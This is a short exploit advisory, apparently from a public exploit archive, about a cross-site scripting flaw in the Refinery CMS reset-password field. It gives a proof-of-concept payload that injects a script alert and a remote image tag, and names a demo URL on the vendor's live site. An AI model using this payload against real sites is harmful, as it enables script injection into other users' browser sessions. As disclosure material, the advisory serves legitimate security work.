Refinery CMS suffers from a cross site scripting vulnerability.
80d6f61550681b6f3435e8e4e3dd82b0c7338fdfebf403a319b613c6e1a8ef08
-------------------------------------------------------------------------------------------------------------
-Exploit Title : RefineryCMS Admin GUI / reset password field input - Cross-Site Scripting Vulnerabilitiy -
-Vendor : Refinery CMS - Refinery -
-Homepage : http://refinerycms.com/ -
-Author : Jan L. (d4g4) -
-Mail : d4g4rcy@yahoo.de -
-Version : All Version -
-Tested on : GNU/Linux -
-Security Risk : High -
-dork : - -
-------------------------------------------------------------------------------------------------------------
-Exploit : -
- -
- </TITLE><SCRIPT>alert("XSS");</SCRIPT><img src=http://data6.blog.de/media/527/4072527_9ad9d031b3_m.jpg> -
- -
-------------------------------------------------------------------------------------------------------------
-Demo : -
- -
-http://refinerycms.com/users/password/new -
-------------------------------------------------------------------------------------------------------------
- -
-Greats : MS&JP -
-------------------------------------------------------------------------------------------------------------